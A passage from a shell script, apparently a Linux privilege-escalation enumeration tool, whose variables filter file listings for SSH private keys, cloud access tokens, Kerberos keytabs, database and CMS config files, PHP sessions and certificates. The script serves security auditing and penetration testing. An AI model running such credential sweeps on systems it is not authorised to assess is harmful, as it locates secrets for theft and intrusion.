"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e 
"$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | 
head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/default/settings.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ovpn$" | 
sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e 
"$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e 